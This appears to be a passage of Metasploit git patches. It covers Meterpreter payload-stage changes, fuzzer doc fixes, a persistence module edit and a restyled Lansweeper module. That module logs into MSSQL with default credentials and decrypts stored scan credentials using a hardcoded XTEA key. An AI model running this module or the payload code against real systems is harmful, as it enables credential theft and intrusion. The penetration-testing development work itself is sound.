+      'Arch'        => ARCH_DALVIK,
+      'License'     => MSF_LICENSE,
+      'Session'     => Msf::Sessions::Meterpreter_Java_Android
+    ))
 
-    register_options(
-    [
+    register_options([
       OptBool.new('AutoLoadAndroid', [true, "Automatically load the Android extension", true])
     ], self.class)
   end
@@ -38,14 +34,20 @@ module Metasploit4
   # used as the final stage
   #
   def generate_stage(opts={})
-    # TODO: wire the UUID into the stage
     clazz = 'androidpayload.stage.Meterpreter'
     metstage = MetasploitPayloads.read("android", "metstage.jar")
     met = MetasploitPayloads.read("android", "meterpreter.jar")
 
     # Name of the class to load from the stage, the actual jar to load
     # it from, and then finally the meterpreter stage
-    java_string(clazz) + java_string(metstage) + java_string(met) + java_string(generate_config(opts))
+    blocks = [
+      java_string(clazz),
+      java_string(metstage),
+      java_string(met),
+      java_string(generate_config(opts))
+    ]
+
+    (blocks + [blocks.length]).pack('A*' * blocks.length + 'N')
   end
 
   def generate_config(opts={})
diff --git a/modules/payloads/stages/java/meterpreter.rb b/modules/payloads/stages/java/meterpreter.rb
index dfa263ef0e..f0e666349d 100644
--- a/modules/payloads/stages/java/meterpreter.rb
+++ b/modules/payloads/stages/java/meterpreter.rb
@@ -10,7 +10,8 @@ require 'msf/base/sessions/meterpreter_java'
 require 'msf/base/sessions/meterpreter_options'
 
 
-module Metasploit3
+module Metasploit4
+
   include Msf::Sessions::MeterpreterOptions
 
   # The stager should have already included this
@@ -18,20 +19,18 @@ module Metasploit3
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'          => 'Java Meterpreter',
-      'Description'   => 'Run a meterpreter server in Java',
-      'Author'        => [
-          'mihi', # all the hard work
-          'egypt' # msf integration
-        ],
-      'Platform'      => 'java',
-      'Arch'          => ARCH_JAVA,
-      'PayloadCompat' =>
-        {
+      'Name'           => 'Java Meterpreter',
+      'Description'    => 'Run a meterpreter server in Java',
+      'Author'         => ['mihi', 'egypt', 'OJ Reeves'],
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'PayloadCompat'  => {
           'Convention' => 'javasocket javaurl',
         },
-      'License'       => MSF_LICENSE,
-      'Session'       => Msf::Sessions::Meterpreter_Java_Java))
+      'License'        => MSF_LICENSE,
+      'Session'        => Msf::Sessions::Meterpreter_Java_Java
+    ))
+
     # Order matters.  Classes can only reference classes that have already
     # been sent.  The last .class must implement Stage, i.e. have a start()
     # method.
@@ -54,12 +53,42 @@ module Metasploit3
   # used as the final stage; calls super to get the intermediate stager.
   #
   def generate_stage(opts={})
-    # TODO: wire the UUID into the stage
     met = MetasploitPayloads.read('meterpreter', 'meterpreter.jar')
+    config = generate_config(opts)
 
-    # All of the dendencies to create a jar loader, followed by the length
-    # of the jar and the jar itself.
-    super(opts) + [met.length].pack("N") + met
+    # All of the dependencies to create a jar loader, followed by the length
+    # of the jar and the jar itself, then the config
+    blocks = [
+      super(opts),
+      [met.length, met].pack('NA*'),
+      [config.length, config].pack('NA*')
+    ]
+
+    # Deliberate off by 1 here. The call to super adds a null terminator
+    # so we would add 1 for the null terminate and remove one for the call
+    # to super.
+    block_count = blocks.length + @stage_class_files.length
+
+    # Pack all the magic together
+    (blocks + [block_count]).pack('A*' * blocks.length + 'N')
   end
 
+  def generate_config(opts={})
+    opts[:uuid] ||= generate_payload_uuid
+
+    # create the configuration block, which for staged connections is really simple.
+    config_opts = {
+      ascii_str:  true,
+      arch:       opts[:uuid].arch,
+      expiration: datastore['SessionExpirationTimeout'].to_i,
+      uuid:       opts[:uuid],
+      transports: [transport_config(opts)]
+    }
+
+    # create the configuration instance based off the parameters
+    config = Rex::Payloads::Meterpreter::Config.new(config_opts)
+
+    # return the XML version of it
+    config.to_b
+  end
 end

From 7f4a96f3dcf436b15c2d99bced282fcb543447f9 Mon Sep 17 00:00:00 2001
From: cldrn <calderon@websec.mx>
Date: Fri, 26 Jun 2015 03:29:17 -0500
Subject: [PATCH 0570/1013] Fixes coding style issues

---
 modules/auxiliary/gather/lansweeper.rb | 209 ++++++++++++-------------
 1 file changed, 97 insertions(+), 112 deletions(-)

diff --git a/modules/auxiliary/gather/lansweeper.rb b/modules/auxiliary/gather/lansweeper.rb
index c0945eb825..a0a67a2fc4 100644
--- a/modules/auxiliary/gather/lansweeper.rb
+++ b/modules/auxiliary/gather/lansweeper.rb
@@ -1,129 +1,114 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Auxiliary
+  include Msf::Exploit::Remote::MSSQL
+  include Msf::Auxiliary::Report
 
-	include Msf::Exploit::Remote::MSSQL
-	include Msf::Auxiliary::Report
+  def initialize(info = {})
+    super(update_info(info,
+    'Name' => 'Lansweeper Collector',
+    'Description' => %q(
+    Lansweeper stores the credentials it uses to scan the computers
+    in its MSSQL database. The passwords are XTea-encrypted with a
+    68 character long key, which first 8 character is stored with the
+    password in the database, and the other 60 is static. Lansweeper by
+    default creates an MSSQL user "lansweeperuser" whose password is
+    "mysecretpassword0*", and stores its data in a database called
+    "lansweeperdb".
+    This module will query the MSSQL database for the credentials.
+    ),
+    'Author' => [
+      # Lansweeper RCE + Metasploit implementation
+      'sghctoma <tamas.szakaly [at] praudit [dot] hu>',
+      # Lansweeper RCE + discovering default credentials
+      'eq <balazs.bucsay [at] praudit [dot] hu>',
+      # Updated module to work on latest version of lansweeper
+      'calderpwn <calderon [at] websec [dot] mx>'
+    ],
+    'License' => MSF_LICENSE,
+    'References' => [
+      [ 'URL', 'http://www.lansweeper.com'],
+      [ 'URL', 'http://www.praudit.hu/prauditeng/index.php/blog/a-lansweeper-es-a-tea']
+    ]
+                     )
+)
 
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Lansweeper',
-			'Description'    => %q{
-					Lansweeper stores the credentials it uses to scan the computers
-					in its MSSQL database. The passwords are XTea-encrypted with a
-					68 character long key, which first 8 character is stored with the
-					password in the database, and the other 60 is static. Lansweeper by
-					default creates an MSSQL user "lansweeperuser" whose password is
-					"mysecretpassword0*", and stores its data in a database called
-					"lansweeperdb".
-					This module will query the MSSQL database for the credentials. 
-			},
-			'Author'         =>
-				[
-					# Lansweeper RCE + Metasploit implementation
-					'sghctoma <tamas.szakaly [at] praudit [dot] hu>' ,
-					
-					# Lansweeper RCE + discovering default credentials
-					'eq <balazs.bucsay [at] praudit [dot] hu>',
+  register_options([
+    OptString.new('USERNAME', [ true, 'The username to authenticate as', 'lansweeperuser' ]),
+    OptString.new('PASSWORD', [ false, 'The password for the specified username', 'mysecretpassword0*' ]),
+    OptString.new('DATABASE', [ true, 'The Lansweeper database', 'lansweeperdb'])
+  ], self.class)
+  end
 
-                                        # Updated module to work on latest version of lansweeper
-                                        'calderpwn <calderon [at] websec [dot] mx>'
-				],
-			'License'        => MSF_LICENSE,
-			'References'     =>
-				[
-					[ 'URL', 'http://www.lansweeper.com'],
-                                        [ 'URL', 'http://www.praudit.hu/prauditeng/index.php/blog/a-lansweeper-es-a-tea']
-				]
-		))
+  def uint32(n)
+    n & 0xffffffff
+  end
 
-		register_options(
-			[
-				OptString.new('USERNAME', [ true, 'The username to authenticate as', 'lansweeperuser' ]),
-				OptString.new('PASSWORD', [ false, 'The password for the specified username', 'mysecretpassword0*' ]),
-				OptString.new('DATABASE', [ true, 'The Lansweeper database', 'lansweeperdb']),
-			], self.class)
-	end
+  def xteadecode(v, k)
+    num = 0xc6ef3720
+    num2 = uint32(v[0])
+    num3 = uint32(v[1])
 
-	def uint32(n)
-		return n & 0xffffffff
-	end
+    for i in 0..0x1f
+      num3 -= uint32((uint32(num2 << 4) ^ uint32(num2 >> 5)) + num2) ^
+              uint32(num + k[uint32(num >> 11) & 3])
+      num3 = uint32(num3)
+      num -= 0x9e3779b9
+      num = uint32(num)
+      num2 -= ((uint32(uint32(num3 << 4) ^ uint32(num3 >> 5)) + num3) ^
+              uint32(num + k[num & 3]))
+      num2 = uint32(num2)
+    end
+    v[0] = num2
+    v[1] = num3
+  end
 
-	def xteadecode(v, k)
-		num = 0xc6ef3720
-		num2 = uint32(v[0])
-		num3 = uint32(v[1])
+  def xteadecrypt(data, key)
+    k = key.ljust(16).unpack('VVVV')
+    num = 0
+    bytes = Array.new
 
-		for i in 0..0x1f
-			num3 -= uint32((uint32(num2 << 4) ^ uint32(num2 >> 5)) + num2) ^
-				uint32(num + k[uint32(num >> 11) & 3])
-			num3 = uint32(num3)
-			num -= 0x9e3779b9
-			num = uint32(num)
-			num2 -= ((uint32(uint32(num3 << 4) ^ uint32(num3 >> 5)) + num3) ^
-				 uint32(num + k[num & 3]))
-			num2 = uint32(num2)
-		end
+    0.step(data.length - 1, 8) do |i|
+      v = data[i, 8].unpack('VV')
+      xteadecode(v, k)
+      bytes[num] = v[0]
+      num += 1
+      bytes[num] = v[1]
+      num += 1
+    end
+    bytes.pack('c*')
+  end
 
-		v[0] = num2
-		v[1] = num3
-	end
+  def lswgeneratepass
+    key = ''
+    for num in 0..60
+      key << [((40 - num) + ((num * 2) + num)) - 1].pack('c')
+      key << [(num + 15) + num].pack('c')
+    end
+    key
+  end
 
-	def xteadecrypt(data, key)
-		k = key.ljust(16).unpack('VVVV')
-		num = 0
-		bytes = Array.new
+  def lswdecrypt(data)
+    data = Rex::Text.decode_base64(data)
 
-		0.step(data.length - 1, 8) do |i|
-			v = data[i, 8].unpack('VV')
-			xteadecode(v, k)
-			
-			bytes[num] = v[0]
-			num += 1
-			bytes[num] = v[1]
-			num += 1
-		end
-		
-		return bytes.pack('c*')
-	end
+    first = data[0]
+    pass = data[1, 8]
+    actualdata = data[9, data.length - 9]
 
-	def lswgeneratepass()
-		key = ''
+    decrypted = xteadecrypt(actualdata, pass + lswgeneratepass)
 
-		for num in 0..60
-			key << [((40 - num) + ((num * 2) + num)) - 1].pack('c')
-			key << [(num + 15) + num].pack('c')
-		end
+    if first == "1"
+      decrypted = decrypted[0, decrypted.length - 2]
+    end
+    Rex::Text.to_ascii(decrypted, 'utf-16le')
+  end
 
-		return key
-	end
-
-	def lswdecrypt(data)
-
-		data = Rex::Text.decode_base64(data)
-
-		first = data[0]
-		pass = data[1,8]
-		actualdata = data[9, data.length - 9]
-
-		decrypted = xteadecrypt(actualdata, pass + lswgeneratepass())
-
-		if first == "1"
-			decrypted = decrypted[0, decrypted.length - 2]
-		end
-
-		return Rex::Text.to_ascii(decrypted, 'utf-16le')
-
-	end
-
-	def run
-		result = mssql_query('select Credname, Username, Password from ' + datastore['DATABASE'] +
-			'.dbo.tsysCredentials WHERE LEN(Password)>64', true) if mssql_login_datastore
-	        
-		result[:rows].each do |row|
-			print_good("Credential name: #{row[0]} | username: #{row[1]} | password: #{lswdecrypt(row[2])} ")
-		end
-
-		disconnect
-	end
+  def run
+    result = mssql_query('select Credname, Username, Password from ' + datastore['DATABASE'] +
+    '.dbo.tsysCredentials WHERE LEN(Password)>64', true) if mssql_login_datastore
+    result[:rows].each do |row|
+      print_good("Credential name: #{row[0]} | username: #{row[1]} | password: #{lswdecrypt(row[2])} ")
+    end
+    disconnect
+  end
 end

From 7aae9b210ec7275843b03c13f02bc9ef7c979e90 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Fri, 26 Jun 2015 11:32:51 -0400
Subject: [PATCH 0571/1013] Add pymet support for core_enumextcmd

---
 data/meterpreter/meterpreter.py               | 59 ++++++++++++++++---
 .../ui/console/command_dispatcher/core.rb     |  3 +-
 2 files changed, 53 insertions(+), 9 deletions(-)

diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index a39fde22ae..bc0aa3d648 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -144,6 +144,19 @@ TLV_TYPE_TARGET_PATH           = TLV_META_TYPE_STRING  | 401
 TLV_TYPE_MIGRATE_PID           = TLV_META_TYPE_UINT    | 402
 TLV_TYPE_MIGRATE_LEN           = TLV_META_TYPE_UINT    | 403
 
+TLV_TYPE_TRANS_TYPE            = TLV_META_TYPE_UINT    | 430
+TLV_TYPE_TRANS_URL             = TLV_META_TYPE_STRING  | 431
+TLV_TYPE_TRANS_UA              = TLV_META_TYPE_STRING  | 432
+TLV_TYPE_TRANS_COMM_TIMEOUT    = TLV_META_TYPE_UINT    | 433
+TLV_TYPE_TRANS_SESSION_EXP     = TLV_META_TYPE_UINT    | 434
+TLV_TYPE_TRANS_CERT_HASH       = TLV_META_TYPE_RAW     | 435
+TLV_TYPE_TRANS_PROXY_HOST      = TLV_META_TYPE_STRING  | 436
+TLV_TYPE_TRANS_PROXY_USER      = TLV_META_TYPE_STRING  | 437
+TLV_TYPE_TRANS_PROXY_PASS      = TLV_META_TYPE_STRING  | 438
+TLV_TYPE_TRANS_RETRY_TOTAL     = TLV_META_TYPE_UINT    | 439
+TLV_TYPE_TRANS_RETRY_WAIT      = TLV_META_TYPE_UINT    | 440
+TLV_TYPE_TRANS_GROUP           = TLV_META_TYPE_GROUP   | 441
+
 TLV_TYPE_MACHINE_ID            = TLV_META_TYPE_STRING  | 460
 TLV_TYPE_UUID                  = TLV_META_TYPE_RAW     | 461
 
@@ -210,6 +223,15 @@ def error_result_windows(error_number=None):
 	result = ((error_number << 16) | ERROR_FAILURE_WINDOWS)
 	return result
 
+@export
+def get_hdd_label():
+	for _, _, files in os.walk('/dev/disk/by-id/'):
+		for f in files:
+			for p in ['ata-', 'mb-']:
+				if f[:len(p)] == p:
+					return f[len(p):]
+	return ''
+
 @export
 def inet_pton(family, address):
 	if hasattr(socket, 'inet_pton'):
@@ -387,6 +409,7 @@ class PythonMeterpreter(object):
 		self.channels = {}
 		self.interact_channels = []
 		self.processes = {}
+		self.transports = []
 		for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
 			self.extension_functions[func[1:]] = getattr(self, func)
 		if self.driver:
@@ -576,15 +599,14 @@ class PythonMeterpreter(object):
 		response += tlv_pack(TLV_TYPE_UUID, PAYLOAD_UUID)
 		return ERROR_SUCCESS, response
 
-	def _core_machine_id(self, request, response):
-		def get_hdd_label():
-			for _, _, files in os.walk('/dev/disk/by-id/'):
-				for f in files:
-					for p in ['ata-', 'mb-']:
-						if f[:len(p)] == p:
-							return f[len(p):]
-			return ""
+	def _core_enumextcmd(self, request, response):
+		extension_name = packet_get_tlv(request, TLV_TYPE_STRING)['value']
+		for func_name in self.extension_functions.keys():
+			if func_name.split('_', 1)[0] == extension_name:
+				response += tlv_pack(TLV_TYPE_STRING, func_name)
+		return ERROR_SUCCESS, response
 
+	def _core_machine_id(self, request, response):
 		serial = ''
 		machine_name = platform.uname()[1]
 		if has_windll:
@@ -635,6 +657,27 @@ class PythonMeterpreter(object):
 		self.running = False
 		return ERROR_SUCCESS, response
 
+	def _core_transport_add(self, request, response):
+		raise NotImplemented()
+
+	def _core_transport_change(self, request, response):
+		raise NotImplemented()
+
+	def _core_transport_list(self, request, response):
+		raise NotImplemented()
+
+	def _core_transport_next(self, request, response):
+		raise NotImplemented()
+
+	def _core_transport_prev(self, request, response):
+		raise NotImplemented()
+
+	def _core_transport_set_timeouts(self, request, response):
+		raise NotImplemented()
+
+	def _core_transport_sleep(self, request, response):
+		raise NotImplemented()
+
 	def _core_channel_open(self, request, response):
 		channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
 		handler = 'channel_open_' + channel_type['value']
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
index e51c470a20..35df3b7972 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -80,8 +80,9 @@ class Console::CommandDispatcher::Core
     if client.platform =~ /win/ || client.platform =~ /linux/
       # Migration only supported on windows and linux
       c["migrate"] = "Migrate the server to another process"
+    end
 
-
+    if client.platform =~ /win/ || client.platform =~ /linux/ || client.platform =~ /python/
       # Yet to implement transport hopping for other meterpreters.
       # Works for posix and native windows though.
       c["transport"] = "Change the current transport mechanism"

From 1d9caeffc0f777e77d8eae862d5dca842dee881f Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 26 Jun 2015 11:22:30 -0500
Subject: [PATCH 0572/1013] Update documentation for fuzzer.rb and file_info.rb

See #5599
---
 lib/msf/core/auxiliary/fuzzer.rb       | 96 ++++++++++++++------------
 lib/msf/core/post/windows/file_info.rb |  8 +--
 2 files changed, 54 insertions(+), 50 deletions(-)

diff --git a/lib/msf/core/auxiliary/fuzzer.rb b/lib/msf/core/auxiliary/fuzzer.rb
index 1185852772..577b59091c 100644
--- a/lib/msf/core/auxiliary/fuzzer.rb
+++ b/lib/msf/core/auxiliary/fuzzer.rb
@@ -48,10 +48,12 @@ module Auxiliary::Fuzzer
     res
   end
 
- # Modifies each byte of the string from beginning to end, packing each element as an 8 bit character.
- #
- # @returns [Array] Returns an array of an array of strings
- # @see #fuzzer_string_format
+  # Modifies each byte of the string from beginning to end, packing each element as an 8 bit character.
+  #
+  # @param str [String] The string the mutation will be based on.
+  # @param max [Fixnum, NilClass] Max string size.
+  # @return [Array] Returns an array of an array of strings
+  # @see #fuzzer_string_format
 
   def fuzz_string_corrupt_byte(str,max=nil)
     res = []
@@ -68,8 +70,9 @@ module Auxiliary::Fuzzer
 
   # Modifies each byte of the string from beginning to end, packing each element as an 8 bit character.
   #
-  #
-  # @returns [Array] Returns an array of an array of strings
+  # @param str [String] The string the mutation will be based on.
+  # @param max [Fixnum, NilClass] Max string size.
+  # @return [Array] Returns an array of an array of strings
   # @see fuzzer_string_format
 
   def fuzz_string_corrupt_byte_reverse(str,max=nil)
@@ -87,7 +90,7 @@ module Auxiliary::Fuzzer
 
   # Useful generators (many derived from AxMan)
   #
-  # @returns [Array] Returns and array of strings.
+  # @return [Array] Returns and array of strings.
 
   def fuzzer_string_format
     res = %W{ %s %p %n %x %@ %.257d %.65537d %.2147483648d %.257f %.65537f %.2147483648f}
@@ -97,7 +100,7 @@ module Auxiliary::Fuzzer
   # Reserved filename array
   # Useful generators (many derived from AxMan)
   #
-  # @returns [Array] Returns and array of reserved filenames in Windows.
+  # @return [Array] Returns and array of reserved filenames in Windows.
 
   def fuzzer_string_filepath_dos
     res = %W{ aux con nul com1 com2 com3 com4 lpt1 lpt2 lp3 lpt4 prn }
@@ -106,7 +109,7 @@ module Auxiliary::Fuzzer
 
   # Fuzzer Numbers by Powers of Two
   #
-  # @returns [Array] Returns an array with pre-set values
+  # @return [Array] Returns an array with pre-set values
 
   def fuzzer_number_power2
     res = [
@@ -128,7 +131,7 @@ module Auxiliary::Fuzzer
 
   # Powers of two by some fuzzing factor.
   #
-  # @returns [Array] Returns and array of integers.
+  # @return [Array] Returns and array of integers.
 
   def fuzzer_number_power2_plus
     res = []
@@ -144,9 +147,10 @@ module Auxiliary::Fuzzer
     block_given? ? res.each { |n| yield(n) } : res
   end
 
-  # Generates a fuzz string
-  # If no block set, will retrive characters from the FuzzChar datastore option
+  # Generates a fuzz string If no block is set, it will retrive characters from the
+  # FuzzChar datastore option.
   #
+  # @param len [Fixnum] String size.
   # @return [String] Returns a string of size 1024 * 512 specified by the user
 
   def fuzzer_gen_string(len)
@@ -198,7 +202,7 @@ module Auxiliary::Fuzzer
 
   # Various URI types
   #
-  # @returns [Array] Returns an array of strings
+  # @return [Array] Returns an array of strings
   def fuzzer_string_uri_types
     res = %W{
       aaa  aaas  about  acap  adiumxtra  afp  aim  apt  aw  bolo  callto  cap  chrome  cid
@@ -216,27 +220,27 @@ module Auxiliary::Fuzzer
     block_given? ? res.each { |n| yield(n) } : res
   end
 
-# Generator for common URI dividers
-#
-# @return [Array] Returns an array of strings
+  # Generator for common URI dividers
+  #
+  # @return [Array] Returns an array of strings
 
   def fuzzer_string_uri_dividers
     res = %W{ : :// }
     block_given? ? res.each { |n| yield(n) } : res
   end
 
-# Generator for common path prefixes
-#
-# @return [Array] Returns an array of strings
+  # Generator for common path prefixes
+  #
+  # @return [Array] Returns an array of strings
 
   def fuzzer_string_path_prefixes
     res = %W{ C:\\ \\\\localhost\\ / }
     block_given? ? res.each { |n| yield(n) } : res
   end
 
-# Generates various small URI string types
-#
-# @return [Array] Returns an array of stings
+  # Generates various small URI string types
+  #
+  # @return [Array] Returns an array of stings
 
   def fuzzer_string_uris_small
     res = []
@@ -268,9 +272,9 @@ module Auxiliary::Fuzzer
     res
   end
 
-# Generates various giant URI string types
-#
-# @return [Array] Returns an array of stings
+  # Generates various giant URI string types
+  #
+  # @return [Array] Returns an array of stings
 
   def fuzzer_string_uris_giant
     res = []
@@ -285,9 +289,9 @@ module Auxiliary::Fuzzer
     res
   end
 
-# Format for the URI string generator
-#
-# @return [Array] Returns an array of stings
+  # Format for the URI string generator
+  #
+  # @return [Array] Returns an array of stings
 
   def fuzzer_string_uris_format
     res = []
@@ -303,9 +307,9 @@ module Auxiliary::Fuzzer
   end
 
 
-# Generates various small strings
-#
-# @return [Array] Returns an array of stings
+  # Generates various small strings
+  #
+  # @return [Array] Returns an array of stings
 
   def fuzzer_string_uris_dos
     res = []
@@ -321,9 +325,9 @@ module Auxiliary::Fuzzer
   end
 
 
-# Generates various small strings
-#
-# @return [Array] Returns an array of stings
+  # Generates various small strings
+  #
+  # @return [Array] Returns an array of stings
 
   def fuzzer_string_paths_small
     res = []
@@ -337,9 +341,9 @@ module Auxiliary::Fuzzer
   end
 
 
-# Generates various small strings
-#
-# @return [Array] Returns an array of stings
+  # Generates various small strings
+  #
+  # @return [Array] Returns an array of stings
 
   def fuzzer_string_paths_long
     res = []
@@ -353,9 +357,9 @@ module Auxiliary::Fuzzer
   end
 
 
-# Generates various giant strings
-#
-# @return [Array] Returns an array of stings
+  # Generates various giant strings
+  #
+  # @return [Array] Returns an array of stings
 
   def fuzzer_string_paths_giant
     res = []
@@ -369,9 +373,9 @@ module Auxiliary::Fuzzer
   end
 
 
-# Format for the path generator
-#
-# @return [Array] Returns an array of stings
+  # Format for the path generator
+  #
+  # @return [Array] Returns an array of stings
 
   def fuzzer_string_paths_format
     res = []
@@ -385,9 +389,9 @@ module Auxiliary::Fuzzer
   end
 
 
-# Generates fuzzer strings using path prefixes
-#
-# @return [Array] Returns an array of stings
+  # Generates fuzzer strings using path prefixes
+  #
+  # @return [Array] Returns an array of stings
 
   def fuzzer_string_paths_dos
     res = []
diff --git a/lib/msf/core/post/windows/file_info.rb b/lib/msf/core/post/windows/file_info.rb
index 420584a12d..40ca6d7439 100644
--- a/lib/msf/core/post/windows/file_info.rb
+++ b/lib/msf/core/post/windows/file_info.rb
@@ -13,10 +13,10 @@ module FileInfo
     num & 0xffff
   end
 
-# File Version
-# @param [String]  filepath The path of the file you are targeting
-#
-# @return [String] Returns the file version of target
+  # Returns the file version information such as: major, minor, build, revision, branch.
+  #
+  # @param filepath [String] The path of the file you are targeting.
+  # @return [String] Returns the file version information of the file.
 
   def file_version(filepath)
     file_version_info_size = client.railgun.version.GetFileVersionInfoSizeA(

From 7ccc86d33843603aa6d7860662a435d9ccb582e8 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 26 Jun 2015 11:54:19 -0500
Subject: [PATCH 0573/1013] Use cmd_exec

---
 modules/exploits/windows/local/persistence.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb
index 0cd6a3fe08..d719b37e3a 100644
--- a/modules/exploits/windows/local/persistence.rb
+++ b/modules/exploits/windows/local/persistence.rb
@@ -230,9 +230,9 @@ class Metasploit4 < Msf::Exploit::Local
     # Error handling for process.execute() can throw a RequestError in send_request.
     begin
       unless datastore['EXE::Custom']
-        session.shell_command_token(script_on_target)
+        cmd_exec("wscript \"#{script_on_target}\"")
       else
-        session.shell_command_token("cscript \"#{script_on_target}\"")
+        cmd_exec("cscript \"#{script_on_target}\"")
       end
     rescue
       print_error("Failed to execute payload on target")

From 0c608e2a4c6047c4200d8b90bf5db82282f996e0 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 26 Jun 2015 12:01:53 -0500
Subject: [PATCH 0574/1013] Change doc for boolean args

---
 lib/msf/core/exploit/file_dropper.rb | 10 +++-------
 1 file changed, 3 insertions(+), 7 deletions(-)

diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb
index 6fe6439c1f..f2bdf4dc07 100644
--- a/lib/msf/core/exploit/file_dropper.rb
+++ b/lib/msf/core/exploit/file_dropper.rb
@@ -102,8 +102,7 @@ module Exploit::FileDropper
   # See if +path+ exists on the remote system and is a regular file
   #
   # @param path [String] Remote filename to check
-  # @return [TrueClass] If the file exists
-  # @return [FalseClass] If the file doesn't exist
+  # @return [Boolean] True if the file exists, otherwise false.
   def file_dropper_file_exist?(session, path)
     if session.platform =~ /win/
       normalized = file_dropper_win_file(path)
@@ -134,8 +133,7 @@ module Exploit::FileDropper
   # Sends a file deletion command to the remote +session+
   #
   # @param [String] file The file to delete
-  # @return [TrueClass] the delete command has been executed in the remote machine
-  # @return [FalseClass] otherwise
+  # @return [Boolean] True if the delete command has been executed in the remote machine, otherwise false.
   def file_dropper_delete(session, file)
     win_file = file_dropper_win_file(file)
 
@@ -172,9 +170,7 @@ module Exploit::FileDropper
   # Checks if a file has been deleted by the current job
   #
   # @param [String] file The file to check
-  # @param [TrueClass] exists_before Indicates if the file existed before the deletion
-  # @return [TrueClass] if the file has been deleted or it cannot resolve
-  # @return [FalseClass] if the file hasn't been deleted
+  # @return [Boolean] If the file has been deleted, otherwise false.
   def file_dropper_deleted?(session, file, exists_before)
     if exists_before  && file_dropper_file_exist?(session, file)
       print_error("Unable to delete #{file}")

From 31eedbcfa0c5da2c8f44676ece18c9a5f6d333a6 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Fri, 26 Jun 2015 12:18:33 -0500
Subject: [PATCH 0575/1013] Minor cleanups on recent modules

Edited modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
first landed in #5577, MS15-034 HTTP.SYS Information Disclosure

Edited modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb
first landed in #5605, CVE-2015-3105 flash exploit

Edited modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb
first landed in #5559, Adobe Flash Player ShaderJob Buffer Overflow

Edited modules/auxiliary/test/report_auth_info.rb first landed in #5540,
@wchen-r7's changes for multiple auxiliary modules to use the new cred
API
---
 .../scanner/http/ms15_034_http_sys_memory_dump.rb        | 2 +-
 .../multi/browser/adobe_flash_shader_drawing_fill.rb     | 7 ++++---
 .../multi/browser/adobe_flash_shader_job_overflow.rb     | 9 +++++----
 test/modules/auxiliary/test/report_auth_info.rb          | 6 +++---
 4 files changed, 13 insertions(+), 11 deletions(-)

diff --git a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
index ff2401db30..7e94815287 100644
--- a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
+++ b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary
     super(update_info(info,
       'Name'        => 'MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure',
       'Description' => %q{
-        Dumps memory contents using a crafted Range header. Affects only
+        This module dumps memory contents using a crafted Range header, and affects only
         Windows 8.1, Server 2012, and Server 2012R2. Note that if the target
         is running in VMware Workstation, this module has a high likelihood
         of resulting in BSOD; however, VMware ESX and non-virtualized hosts
diff --git a/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb b/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb
index 0de86549e6..68a671f847 100644
--- a/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb
+++ b/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb
@@ -16,9 +16,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description'         => %q{
         This module exploits a memory corruption happening when applying a Shader as a drawing fill
         as exploited in the wild on June 2015. This module has been tested successfully on:
-        Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188.
-        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188.
-        Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188.
+
+        Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188,
+        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188,
+        Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188, and
         Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.
       },
       'License'             => MSF_LICENSE,
diff --git a/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb b/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb
index b92a96839f..8c833f900e 100644
--- a/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb
+++ b/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb
@@ -20,10 +20,11 @@ class Metasploit3 < Msf::Exploit::Remote
         of the ShaderJob after starting the job it's possible to create a buffer overflow condition
         where the size of the destination buffer and the length of the copy are controlled. This
         module has been tested successfully on:
-        * Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169.
-        * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169.
-        * Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169.
